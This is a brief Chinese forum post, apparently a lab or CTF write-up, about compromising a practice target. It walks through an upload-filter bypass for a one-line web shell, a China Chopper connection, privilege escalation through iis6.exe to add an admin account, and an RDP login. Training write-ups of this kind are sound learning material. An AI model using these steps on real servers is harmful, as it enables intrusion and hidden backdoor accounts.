靶场第六题 九五作业
通过第五题进入了后台找到产品管理可以修改上传文件
制作了一句话木马程序,把后缀名改为cer可以上传
之后用菜刀连接,但是没有权限访问C盘
通过E:5\admin\Databackup\打开CMD
输入命令whoima,拒绝访问
输入命令iis6.exe "net user jiuwu 1234 /add"
net user发现成功添加用户
mstsc /admin命令,远程连接桌面120.203.13.75
使用用户名jiuwu,密码1234 就可以登陆到网站服务器
打赏我,让我更有动力~
0 条回复
|
直到 2018-7-31 |
1199 次浏览
登录后才可发表内容
返回首页
CTF&WP专版
